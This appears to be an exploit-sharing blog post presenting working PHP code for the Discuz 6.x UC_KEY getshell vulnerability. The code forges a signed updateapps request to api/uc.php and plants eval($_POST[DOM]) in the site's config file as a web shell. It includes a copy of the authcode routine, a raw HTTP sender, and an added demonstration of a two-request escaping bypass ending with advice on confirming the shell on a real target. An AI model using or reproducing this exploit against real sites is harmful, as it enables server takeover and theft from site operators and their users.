DZ6.x UC_KEY getwebshell exploit
Exploits for the UC_KEY vulnerability in the DZ X series are already available online. Today I ran into a site running dz6.0, so I read its code, modified the exploit accordingly, and am sharing it with whoever needs it. UC_KEY getshell is a vulnerability with a wide and long-lasting impact: in general, any program that uses UCenter as its user center can be exploited, but the concrete exploit has to be written for the concrete program, because the request format and the config rewrite differ between versions. The latest DZ version appears to have fixed it, and no specific code is available for it.
Note:
1. XML parsing in dz6.x is different, so the exp has to be adjusted to the way api/uc.php reads the request body:
$post = uc_unserialize(uc_post_contents());
2. In earlier versions $UC_API is not escaped before it is written into the config file, so there is no need to submit two packets; a single updateapps request puts the payload straight into the define():
$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile);
3. The encryption function (_authcode) in earlier versions is also different, so the exp carries its own copy of it.
<?php
// The Code copyright belongs to the original author!
// UC_KEY getshell for DZ 6.x: forge the authcode()-signed "code" parameter for
// action=updateapps and push a UC_API value that breaks out of the define()
// in config.inc.php. One request is enough on 6.x (see note 2 above).
$timestamp = time() + 10 * 3600;   // must pass the api's time window check
$host = "127.0.0.1";
$uc_key = "Hangzhou";               // the target's UC_KEY
$code = urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

// Request body for updateapps. The XML tags were dropped by the page's text
// extraction and are restored here from the standard updateapps request format.
// The \' is only PHP escaping inside this single-quoted literal; the value
// actually sent is  http://xxx');eval($_POST[DOM]);//
$cmd1 = '<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');eval($_POST[DOM]);//</item>
</root>';
$html1 = send($cmd1);
echo $html1;

// Raw HTTP POST to api/uc.php with the forged code parameter.
function send($cmd) {
    global $host, $code;
    $message  = "POST /dz/api/uc.php?code=" . $code . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";   // blank line ends the headers
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}

// Copy of the earlier-version _authcode(): RC4-style keystream derived from
// md5(UC_KEY), with a 4-byte random prefix, an expiry field and a 16-byte
// md5 check in front of the plaintext. ENCODE produces the "code" value.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key  = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
?>
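To see why note 2 makes the difference between one packet and two, the following added example (my own code, not part of the original exploit or of Discuz/UCenter) replays the updateapps config rewrite quoted in note 2 against a constructed config.inc.php and uses PHP's standard tokenizer (token_get_all) to tell whether eval() ended up as live code or merely as text inside the UC_API string literal. The sample config, the helper names rewrite_uc_api, eval_is_live and uc_api_line, and the use of addslashes() to model the escaping of the later series are all assumptions made for the example; the page itself only states that 6.x does not escape the value.

```php
<?php
// Added example, not part of the original exploit or of Discuz/UCenter code.
// Replays the updateapps config rewrite from note 2 on a constructed
// config.inc.php and checks with the PHP tokenizer whether eval() became
// live code or stayed inside the UC_API string literal.

// Constructed stand-in for config.inc.php; not taken from any real site.
function sample_config() {
    return "<?php\n"
         . "define('UC_CONNECT', 'mysql');\n"
         . "define('UC_API', 'http://127.0.0.1/uc_server');\n"
         . "define('UC_IP', '');\n";
}

// The rewrite exactly as the page quotes it from api/uc.php.
function rewrite_uc_api($configfile, $UC_API) {
    return preg_replace("/define\('UC_API',\s*'.*?'\);/i",
                        "define('UC_API', '$UC_API');", $configfile);
}

// True when eval appears as a T_EVAL token, i.e. as code that runs when the
// config file is included, rather than as text inside a string or comment.
function eval_is_live($php_source) {
    foreach (token_get_all($php_source) as $tok) {
        if (is_array($tok) && $tok[0] === T_EVAL) {
            return true;
        }
    }
    return false;
}

// The rewritten UC_API line, for display.
function uc_api_line($configfile) {
    preg_match("/^define\('UC_API'.*\$/m", $configfile, $m);
    return $m[0];
}

// The exploit's UC_API value. The \' is only PHP escaping inside this
// literal; the value actually sent is  http://xxx');eval($_POST[DOM]);//
$payload = 'http://xxx\');eval($_POST[DOM]);//';

// Case 1: value written unescaped, as note 2 says 6.x does. One request.
$one_unescaped = rewrite_uc_api(sample_config(), $payload);

// Case 2: value escaped first. The escaping is modelled as addslashes(), an
// assumption about the later series. The resulting \' keeps the whole tail
// inside a valid string literal, so nothing runs after this request.
$one_escaped = rewrite_uc_api(sample_config(), addslashes($payload));

// Case 3: a second, harmless update on top of case 2. The non-greedy .*?
// stops at the first '); it meets, which is the escaped quote inside the
// stored value, so the rewrite cuts the literal short and leaves eval()
// outside it. This is the two-packet trick.
$two_escaped = rewrite_uc_api($one_escaped, 'http://xxx');

foreach (['unescaped, 1st request' => $one_unescaped,
          'escaped, 1st request'   => $one_escaped,
          'escaped, 2nd request'   => $two_escaped] as $label => $cfg) {
    printf("%-24s %-5s %s\n", $label,
           eval_is_live($cfg) ? 'LIVE' : 'inert', uc_api_line($cfg));
}
```

Run it with the php CLI: the unescaped single request and the escaped second request both report LIVE, the escaped single request reports inert. The tokenizer check is also the practical way to confirm a write on a real target: fetch the written config line and verify that eval() sits outside the quotes before relying on the shell.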